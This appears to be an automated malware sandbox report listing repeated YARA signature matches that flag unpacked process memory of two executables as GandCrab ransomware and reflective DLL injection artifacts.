                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 35.3.mqsmvj.exe.3970000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 23.3.mqsmvj.exe.3a70000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 19.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 28.3.mqsmvj.exe.3130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 12.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 19.3.mqsmvj.exe.3930000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 11.3.mqsmvj.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 38.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 30.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 39.3.mqsmvj.exe.2fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 22.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 26.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 11.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 27.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 12.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 16.3.mqsmvj.exe.3b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
